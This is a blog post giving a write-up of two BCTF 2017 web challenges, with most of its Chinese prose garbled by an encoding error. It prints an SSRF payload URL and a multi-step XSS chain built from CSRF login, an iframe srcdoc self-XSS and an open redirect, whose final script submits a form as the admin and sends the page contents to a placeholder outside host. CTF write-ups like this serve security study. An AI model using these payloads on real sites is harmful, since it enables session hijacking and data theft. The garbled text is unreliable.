LoRexxar's Blog

bctf2017 web閮ㄥ垎wp

2017/04/18

鍛ㄦ湯骞蹭簡涓鍙慴ctf锛屽洜涓哄懆鍏嚭鍘荤帺浜嗭紝鎵浠ユ病鑳界湅瀹屾墍鏈夌殑web棰樿繕鏄尯鍙儨鐨勶紝鍏堟暣鐞嗗凡缁忓仛浜嗙殑2閬撶伀鏃ヨ仛鑱氱殑web棰橈紝鍚庨潰鍦ㄦ暣鐞嗗埆鐨勯鐩

image_1bdt8qkc81s8ni7h17b7j21ck19.png-55.4kB

paint

image_1bdt8uheq1gjhk37fht1nf81hd2m.png-98.3kB

鎵撳紑棰樼洰鏄竴涓敾鐢绘澘锛岄櫎浜嗗熀鏈殑鐢荤敾鍔熻兘浠ュ锛岃繕鍙互涓婁紶鍥剧墖鏂囦欢銆傛祬閫涗竴涓嬫暣涓珯涓嶉毦鍙戠幇鏈夋晥鐨勭洰鏍囩偣鍙湁2涓紝image.php鍜寀pload.php銆

棣栧厛鍒嗘瀽upload.php锛屽彲浠ヤ笂浼犱换鎰忔枃浠讹紝浣嗚姹備笂浼犳枃浠跺悗缂蹇呴』涓哄浘鐗囷紝鎰熻搴旇鏄櫧鍚嶅崟锛屼笂浼犱箣鍚庢枃浠朵細鏀瑰悕锛屾渶閲嶈鐨勪竴鐐癸紝涓婁紶鍥剧墖鐨勭洰褰曟湇鍔$鍋氫簡璁剧疆锛php鍚庣紑鐨勬枃浠朵細鐩存帴杩斿洖403锛岃繖涔熻鏄庝簡鍚庨潰鐨勬紡娲炵被鍨嬨

鏌ョ湅鍙抽敭婧愮爜鑾峰緱鎻愮ず锛宖lag鍦╢lag.php銆

鐒跺悗鏄痠mage.php锛宨mage.php鐩存帴浼犲叆url锛屼紶鍏rl鍚庯紝浼氬厛缁忚繃涓涓熀鏈殑鍒ゆ柇锛堟劅瑙夋槸姝e垯锛夛紝鍙厑璁镐紶鍏ttp鎴栬卙ttps鍗忚鐨剈rl锛岃屼笖涓嶈兘鍑虹幇127.0.0.1锛岀劧鍚庢湇鍔″櫒浼curl鐩爣鑾峰彇杩斿洖锛岀粡杩php gd搴鐨勫垽鏂紝濡傛灉閫氳繃鍒ゆ柇锛岄偅涔堜細杩斿洖浼犲叆鍥剧墖鐨勫湴鍧锛屽鏋滄病閫氳繃鍒ゆ柇锛屼細杩斿洖curl杩斿洖鐨勫唴瀹归暱搴﹀拰not image.

杩欓噷鎴戜滑鎶婂煙鍚嶆寚鍚127.0.0.1锛岀劧鍚庤姹俧lag.php

image_1bdtb3dlk36js2i1605osn1hsq13.png-126.2kB

鎴戜滑鐪嬪埌杩斿洖闀垮害374

image_1bdtbdbq012ntmdqss1ep03s21g.png-63.6kB

鐩存帴璁块棶闀垮害鏄80锛岄偅涔堟濊矾娓呮浜嗭紝鎴戜滑骞朵笉闇瑕佽鍙栨湰鍦版枃浠讹紝鍙渶瑕佽幏鍙栧埌鍐呯綉鐨刦lag.php鐨勫唴瀹瑰氨濂戒簡銆

纭畾浜嗙洰鏍囦箣鍚庯紝鍏抽敭灏卞湪浜庡浣曞埄鐢ㄤ簡銆

濡傛灉鎴戜滑鎯宠幏鍙栧埌杩欎釜ssrf鐨勮繑鍥炲硷紝灏卞繀椤昏杩斿洖鍊奸氳繃gd搴撶殑鍒ゆ柇锛岃gd搴撹涓鸿繖鏄竴寮犲浘鐗囷紝鐒跺悗鎴戜滑璇锋眰鍥剧墖灏卞彲浠ヨ幏寰楄繑鍥炪

杩欓噷鏈変釜灏弔ricks

image_1bdtbp175hhc1nnjeg4lde1i8q1t.png-8.2kB

閫氳繃鏋勯犺姹傦紝鍙互璁ヽurl璇锋眰澶氫釜椤甸潰锛屽皢杩斿洖鍊兼嫾鎺ヨ捣鏉ワ紝閫氳繃鍒嗗壊涓寮犲浘鐗囩殑涓3閮ㄥ垎锛屼笂浼犵涓閮ㄥ垎鍜岀涓夐儴鍒嗭紝鎶婁腑闂翠綅缃~鍏呬负flag.php锛岃繖鏍穏d搴撳氨浼氳涓鸿姹傚埌浜嗕竴寮犲浘鐗囷紝鎴戜滑灏辫兘鑾峰彇鍒扮粨鏋滀簡銆

鏈缁坧ayload

1
http://xxxxxx/uploads/{149232828259FrA52FJy.gif,flag.php,149232828365div3po3O.gif}

浣嗕簨瀹炰笂锛岄鐩苟涓嶄細濡傛垜浠兂璞′竴鑸紝鍥犱负php gd闄や簡鑾峰彇杩斿洖鍊煎啓鍏ュ浘鐗囦互澶栵紝杩樹細瀵瑰浘鐗囧仛閮ㄥ垎澶勭悊锛屽浜巎pg鏉ヨ锛屽浘鐗囧唴瀹规敼鍔ㄨ繃澶э紝鑰実if灏变細鐩稿濂藉緢澶氾紝鑰屼笖鍥剧墖鐨別xif淇℃伅閮ㄥ垎涓嶄細琚鐞嗭紝鎴戜滑鐨勭洰鏍囧氨鏄湪鍥剧墖涓嶈鐮村潖鐨勫熀纭涓婏紝灏唂lag.php鐨勫唴瀹瑰啓鍏ュ埌杩欓噷銆

杩樻壘鍒颁簡涓浜涚浉鍏崇殑鏂囩珷

http://www.freebuf.com/articles/web/54086.html

https://github.com/RickGray/Bypass-PHP-GD-Process-To-RCE

鏈缁堟垚鍔熺殑鍥剧墖

image_1bdtccqam15qf1hai1st21f661v2k2a.png-447.9kB

diary

杩欐槸涓涓濊矾闈炲父濂囧鐨剎ss棰樼洰锛屾垜浠厛浠庡ご鏉ョ湅鐪嬭繖涓鐩

image_1bdte4eg9k9s13urld1g8t1jmt2n.png-99.1kB

鏃犳剰闂存壘鍒颁簡绫讳技鐨勫師鏂

https://whitton.io/articles/uber-turning-self-xss-into-good-xss/

鍥藉唴鏈変汉缈昏瘧浜嗘枃绔狅紝鍙儨wooyun娌′簡
http://www.vuln.cn/6530

鎺ヤ笅鏉ユ垜浠潵鍒嗘瀽杩欎釜棰樼洰

csrf

鎵撳紑棰樼洰棣栧厛鏄http://diary.bctf.xctf.org.cn/

娉ㄥ唽鐧诲綍锛屽彲浠ュ彂鐜版椂O2auth鐧婚檰锛宒iary鍩熶細鍘籥uth鍩熻姹備竴涓洖璋僣ode锛岀劧鍚庤繑鍥瀌iary鐧婚檰鎴愬姛銆

diary鍜宎uth鏈変袱涓垎鍒殑鍩燂紝鍥犳鏈変袱涓垎鍒殑session锛岃繖閲屾湁涓殣钘忔潯浠鐧婚檰璇锋眰涓嶅甫鏈塩srftoken锛屾墍浠ュ瓨鍦╟srf

self-xss

鐧婚檰鎴愬姛鍚庯紝涓昏鏈夊嚑涓姛鑳斤紝绗竴涓槸diary锛屽彲浠ョ紪杈戠被浼间簬鎻忚堪涔嬬被鐨勶紝杩欓噷瀛樺湪涓涓猻elf-xss婕忔礊锛屼絾鏄痵elf-xss姣旇緝鐗规畩銆

杩欓噷鐢ㄦ埛鐨勮緭鍏ョ洿鎺ラ氳繃鎶撳寘淇敼锛屽湪鏈嶅姟绔笉浼氭湁浠讳綍杩囨护锛屼絾鏄鍙栧埌涔嬪悗浼犲叆鐨勯〉闈㈠唴缁忚繃浜嗕竴娆″墠绔殑杩囨护銆

杩囨护鍑芥暟寰堝鏉傦紝浣嗕富瑕佹敞鎰忓嚑涓湴鏂广傜涓涓槸鍏充簬img鐨勮繃婊

image_1bdter1ojars1t0gfcf11ss1vl634.png-15kB

img鏍囩涓嶈兘瀛樺湪on寮澶寸殑灞炴

鐒跺悗鏄爣绛剧殑榛戝悕鍗

image_1bdtes5dj14jg1atr5tf1chg8hb3h.png-31.2kB

缁嗗績涓鐐瑰効鍙互鍙戠幇锛宨frame鏍囩鍏跺疄娌¤杩囨护锛岃岄氳繃srcdoc灞炴э紝鍙互浜х敓涓涓悓婧愪笅鐨勫瓙绐楀彛锛屽瓙绐楀彛涓嬪彲浠ラ殢渚挎瀯閫爅s

payload

1
2
3
<iframe srcdoc="<script>alert(1);</script>">
</iframe>

鎴愬姛浜嗭紝鐒跺悗鎴戜滑鎺ョ潃鐪嬬珯

鐩爣

survey鏄竴涓〃鍗曪紝鎴戜滑闅忎究鎻愪氦鐐瑰効浠涔堬紝浼氬緱鍒

1
Thank you. But the boss said only admin can get the flag after he finishes this survey, XD

鐪嬫潵杩欏氨鏄垜浠殑鐩爣浜嗭紝杩欓噷闇瑕佹敞鎰忎簡锛宻urvey杩欐鎻愪氦鏄甫鏈塩srftoken鐨勶紝涔熷氨鏄笉瀛樺湪csrf婕忔礊銆

绠$悊鍛樺鏍

鐒跺悗鏄痳eport bug鍔熻兘锛屽鏋滄垜浠殢渚挎彁浜や釜url锛屼細杩斿洖

1
We only care about the problem from this website (http://diary.bctf.xctf.org.cn)!

浣嗘槸绾佃鏁翠釜绔欙紝鎴戜滑涓嶉毦鍙戠幇锛屾暣绔欐槸鐢眃jango鍐欑殑锛岀◢寰祴璇曚笅鍙互鍙戠幇瀛樺湪闈欐佹枃浠朵换鎰忚烦杞紡娲

1
2
3
http://diary.bctf.xctf.org.cn/static/%5C%5C119.29.192.14/bctf2017/xss/xss.html
杩欐牱灏变細璋冨埌鐩爣绔欎簡

鏁寸悊鏀诲嚮鎬濊矾

鑷繁鐮旂┒鍘熸枃缁撳悎鍓嶉潰鍙戠幇鐨勪竴浜涙紡娲烇紝鎴戜滑涓嶉毦鏁寸悊鍑烘暣涓敾鍑绘濊矾銆

1銆佹彁浜ゅ甫鏈塸ayload鐨勫鍩熼摼鎺ワ紝閫氳繃浠绘剰璺宠浆缁曡繃鍒ゆ柇锛岃admin璁块棶銆
2銆乤dmin璁块棶鍚庨鍑篸iary鍩熺殑鐧婚檰锛屼絾淇濈暀浜哸uth鍩熺殑session銆
3銆乥ot鐢ㄦ垜浠簨鍏堝噯澶囧ソ鐨則oken锛堣繖姝ュ彲浠ュ姩鎬侊級鐧婚檰锛岃闂垜浠簨鍏堟瀯閫犲ソ鐨刣iary椤甸潰銆
4銆乨iary椤甸潰鏄簨鍏堢敤iframe鎻掑叆鐨刯s锛屽綋bot璁块棶鐨勬椂鍊欙紝鍏堟墦寮涓涓柊鐨刬frame瀛愮獥鍙i鍑哄綋鍓嶈处鍙凤紝鐒跺悗璁块棶login鐧婚檰鍥瀊ot璐﹀彿銆
5銆佺瓑寰呬笂姝ュ畬鎴愬悗锛屾柊鎵撳紑涓涓猧frame瀛愮獥鍙o紝璁块棶survey锛屽悜寤鸿妗嗗唴鍐欏叆鏁版嵁锛岀偣鍑籹ubmit銆
6銆佺瓑寰呬笂姝ュ畬鎴愬悗锛岃幏鍙栧瓙绐楀彛鍐呭锛岃烦杞嚦鎺ュ彈flag鐨勫湴鏂

鎬濊矾鐞嗘槑鐧戒簡锛屽氨鍓╀笅鍐檖ayload浜嗐

鏈缁坧ayload

棣栧厛鏄痻ss1.html锛屼篃灏辨槸涓婇潰鐨勫墠涓夋

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<meta http-equiv="Content-Security-Policy" content="img-src http://diary.bctf.xctf.org.cn">
<img src="http://diary.bctf.xctf.org.cn/accounts/logout/" onerror="login();">
<script>
var login = function() {
var loginImg = document.createElement('img');
loginImg.src = 'http://diary.bctf.xctf.org.cn/accounts/login/';
loginImg.onerror = redir;
}
//鐢ㄦ垜浠殑code鐧诲綍
var redir = function() {
var code = "kAj32I0LE2KETl5ZHS6FFRJohsE4LA";
var loginImg2 = document.createElement('img');
loginImg2.src = 'http://diary.bctf.xctf.org.cn/o/receive_authcode?state=preauth&code=' + code;
loginImg2.onerror = function() {
window.location = 'http://diary.bctf.xctf.org.cn/diary/';
}
}
</script>

鐒跺悗鏄痻ss2.html锛屼笂闈㈡彁鍒扮殑绗洓姝

1
2
3
4
5
6
7
8
<meta http-equiv="Content-Security-Policy" content="img-src http://diary.bctf.xctf.org.cn">
<img src="http://diary.bctf.xctf.org.cn/accounts/logout/" onerror="redir();">
<script>
var redir = function() {
window.location = 'http://diary.bctf.xctf.org.cn/accounts/login/';
};
</script>

鏈鍚庢槸瀹屾垚鏀诲嚮鐨刾ayload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<iframe src='http://119.29.192.14/bctf2017/xss/xss2.html'>
</iframe>
<script>
setTimeout(function() {
var profileIframe = document.createElement('iframe');
profileIframe.setAttribute('src', 'http://diary.bctf.xctf.org.cn/survey/');
profileIframe.setAttribute('id', 'survey');
document.body.appendChild(profileIframe);
profileIframe.onload = function() {
document.getElementById('survey').contentWindow.document.forms[0].suggestion.value='give me flag';
document.getElementById('survey').contentWindow.document.forms[0].submit();
setTimeout('location.href=\'//xxx?flag=\'+document.getElementById(\'survey\').contentWindow.document.body.innerHTML;', 3000);
}
}, 5000);
</script>

image_1bdtg2l1d198b1jph13fmffqg5g3u.png-50.5kB

鎻愪氦鍚庣瓑寰呬竴浼氬効锛屾垚鍔熸敹鍒颁簡杩斿洖

image_1bdtg5fqebnmier3bkmcc1heb4b.png-92.1kB

CATALOG
  1. 1. paint
  2. 2. diary
    1. 2.1. csrf
    2. 2.2. self-xss
    3. 2.3. 鐩爣
    4. 2.4. 绠$悊鍛樺鏍
    5. 2.5. 鏁寸悊鏀诲嚮鎬濊矾
    6. 2.6. 鏈缁坧ayload